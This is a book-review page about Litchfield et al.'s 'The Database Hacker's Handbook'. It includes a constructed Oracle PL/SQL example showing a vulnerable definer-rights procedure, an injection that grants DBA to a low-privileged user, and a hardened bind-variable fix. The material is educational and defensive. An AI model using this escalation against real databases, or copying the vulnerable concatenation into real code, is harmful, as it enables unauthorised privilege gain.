The Database Hacker's Handbook
Defending Database Servers
Litchfield, Anley, Heasman, and Grindlay's exhaustive 2005 reference on attacking and defending Oracle, SQL Server, DB2, MySQL, PostgreSQL, Sybase, and Informix — the era when the database engine itself was the soft target.
- Published: 2005
- Publisher: Wiley
- Pages: 500
- Language: English
Read this if
Vulnerability researchers and DBAs interested in the genealogy of database security. The Oracle and SQL Server chapters are still the most thorough printed references on the engines' internal attack surface and the patterns Litchfield made famous.
Skip this if
Anyone needing current cloud-database (RDS, Aurora, Cosmos, BigQuery) tradecraft, modern application-layer SQLi (handled by The Web Application Hacker's Handbook), or NoSQL-injection techniques. The book pre-dates almost everything load-bearing in 2026 database security.
Key takeaways
- Database engines were once routinely RCE-able from a low-privileged session; the chapters document the engine-level flaws that made that true, which is the backdrop for the later hardening of the engines and for the move toward managed cloud databases.
- The Oracle PL/SQL injection material is still the canonical reference and influenced a generation of vulnerability research.
- The book's structural argument — every database is a different OS — explains why per-engine deep knowledge is still required for serious database security work.
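The PL/SQL injection pattern the Oracle chapters document, as an added illustration constructed for this page (not code from the book): a definer-rights procedure that splices its argument into dynamic SQL, the call a low-privileged user makes to run their own function with the owner's privileges, and the bind-variable, invoker-rights rewrite that closes the hole. The schemas APP_OWNER and SCOTT, the ACCOUNTS table and the procedure and function names are assumptions.

```sql
-- Constructed illustration of PL/SQL injection; schema and object names are hypothetical.

-- 1. Vulnerable: a definer-rights procedure in a privileged schema that
--    concatenates its argument into a dynamic statement and is callable by all.
CREATE OR REPLACE PROCEDURE app_owner.get_balance (p_owner IN VARCHAR2)
  AUTHID DEFINER
AS
  v_sql     VARCHAR2(4000);
  v_balance NUMBER;
BEGIN
  -- p_owner becomes part of the statement text, so it can change the statement.
  v_sql := 'SELECT balance FROM app_owner.accounts WHERE owner = '''
           || p_owner || '''';
  EXECUTE IMMEDIATE v_sql INTO v_balance;
  DBMS_OUTPUT.PUT_LINE('balance = ' || v_balance);
END;
/
GRANT EXECUTE ON app_owner.get_balance TO PUBLIC;

-- 2. Attack: a low-privileged user (SCOTT) defines an invoker-rights function
--    with an autonomous transaction, so DDL can run from inside a query.
--    Called from inside GET_BALANCE, "current user" is APP_OWNER, so the GRANT
--    is attempted with APP_OWNER's privileges (it succeeds if APP_OWNER holds
--    DBA or GRANT ANY ROLE directly).
CREATE OR REPLACE FUNCTION scott.escalate RETURN NUMBER
  AUTHID CURRENT_USER
AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO scott';
  COMMIT;
  RETURN 1;
END;
/
GRANT EXECUTE ON scott.escalate TO PUBLIC;

-- The argument closes the string literal, adds a predicate that calls the
-- attacker's function, and comments out the closing quote the procedure appends.
-- Even if the SELECT ... INTO then fails (no rows, too many rows), the GRANT
-- has already been committed by the autonomous transaction.
BEGIN
  app_owner.get_balance('x'' OR scott.escalate() = 1 --');
END;
/

-- 3. Hardened: bind the value instead of concatenating it, and run with the
--    caller's privileges so that an injection could gain nothing anyway.
--    (Callers now need SELECT on app_owner.accounts in their own right.)
CREATE OR REPLACE PROCEDURE app_owner.get_balance (p_owner IN VARCHAR2)
  AUTHID CURRENT_USER
AS
  v_balance NUMBER;
BEGIN
  -- A bind variable is data, never statement text.
  EXECUTE IMMEDIATE
    'SELECT balance FROM app_owner.accounts WHERE owner = :1'
    INTO v_balance USING p_owner;
  DBMS_OUTPUT.PUT_LINE('balance = ' || v_balance);
END;
/
```

Two caveats a reviewer would raise: identifiers (table or column names) cannot be bound, so when the dynamic part is an object name validate it with DBMS_ASSERT (for example DBMS_ASSERT.SQL_OBJECT_NAME or ENQUOTE_NAME) before concatenating; and AUTHID CURRENT_USER only helps if the privileged schema's objects are not themselves granted to PUBLIC, which is the audit the book's Oracle chapters are really about.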
Notes
Pair with The Web Application Hacker's Handbook (Stuttard / Pinto) for the application-layer view that displaced most of this book's relevance and with Litchfield's later research (Oracle Hacker's Handbook, SQL Server vulnerability research) for the depth-on-one-engine companions. A historical reference today, but the only printed source of its kind for the engine-internals era.
What to read before
Intermediate · 2021
Real-World Cryptography
David Wong's hands-on tour of the cryptographic primitives, protocols and pitfalls that show up in actual production systems, with deliberate attention to TLS, Noise, modern AEAD, and post-quantum.
Intermediate · 2021
Designing Secure Software
Loren Kohnfelder, whose 1978 MIT thesis introduced the digital certificate, on how to weave security thinking through requirements, design, implementation and operations rather than bolt it on at the end.
Intermediate · 2014
Threat Modeling
Adam Shostack's practitioner-oriented introduction to threat modeling: STRIDE, attack trees, and how to fit the practice into a real software-development lifecycle.
What to read next
Advanced · 2006
The Art of Software Security Assessment
The 1200-page reference on auditing C/C++ codebases for security: parsing complex memory and integer interactions, language pitfalls, and how vulnerabilities arise from interactions between layers.
Advanced · 2011
The Tangled Web
The deepest book ever written on the strange, accreted security model of the web browser.
Advanced · 2022
Gray Hat Hacking
A multi-author breadth-first reference covering the modern offensive landscape: web, binary, hardware, IoT, mobile, cloud, and adversarial ML — the closest thing in print to a single-volume snapshot of where offensive security is.
Explore similar books
Intermediate · 2021
Real-World Cryptography
David Wong's hands-on tour of the cryptographic primitives, protocols and pitfalls that show up in actual production systems, with deliberate attention to TLS, Noise, modern AEAD, and post-quantum.
Advanced · 2011
The Tangled Web
The deepest book ever written on the strange, accreted security model of the web browser.
Advanced · 2006
The Art of Software Security Assessment
The 1200-page reference on auditing C/C++ codebases for security: parsing complex memory and integer interactions, language pitfalls, and how vulnerabilities arise from interactions between layers.